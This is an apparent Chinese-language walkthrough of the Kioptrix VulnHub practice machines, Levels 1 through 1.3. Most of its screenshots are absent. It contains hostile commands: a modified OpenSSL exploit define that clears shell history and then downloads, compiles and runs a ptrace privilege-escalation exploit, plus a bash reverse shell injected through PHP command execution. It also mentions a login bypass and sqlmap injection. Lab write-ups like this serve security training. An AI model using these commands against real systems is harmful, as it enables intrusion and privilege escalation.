CTF靶场系列-Kioptrix全集
下载地址
#Kioptrix: Level 1 (#1) https://download.vulnhub.com/kioptrix/Kioptrix_Level_1.rar #Kioptrix: Level 1.1 (#2) https://download.vulnhub.com/kioptrix/Kioptrix_Level_2-update.rar #Kioptrix: Level 1.2 (#3) https://download.vulnhub.com/kioptrix/KVM3.rar #Kioptrix: Level 1.3 (#4) https://download.vulnhub.com/kioptrix/Kioptrix4_vmware.rar
实战演练
Kioptrix_Level_1
查找该靶机的IP为192.168.199.230







在764.c里面加入下面几句
#include <openssl/rc4.h> #include <openssl/md5.h> #define SSL2_MT_ERROR 0 #define SSL2_MT_CLIENT_FINISHED 3 #define SSL2_MT_SERVER_HELLO 4 #define SSL2_MT_SERVER_VERIFY 5 #define SSL2_MT_SERVER_FINISHED 6 #define SSL2_MAX_CONNECTION_ID_LENGTH 16
就可以编译成功
这个站好像死了,我们换另外一个网站的
#define COMMAND2 “unset HISTFILE; cd /tmp; wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \n”


Kioptrix_Level_1.1
扫描网段,找到IP为192.168.199.170
80端口打开,看看有没有东西
有登录框使用万能密码登录一下
sqlmap跑了一下,有注入,不过后面有命令执行,就忽略



使用nc监听1234端口,然后在PHP执行下面命令
;bash -i >& /dev/tcp/192.168.199.176/1234 0>&1


提权


Kioptrix_Level_1.2
找到靶机的IP是192.168.199.218











使用这两个账号能够登录进ssh



kioptrix_level 1.3
压缩包解压后,发现只有一个虚拟硬盘,需要打开一个虚拟机加入这块硬盘






找到了几个用户







本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
文章目录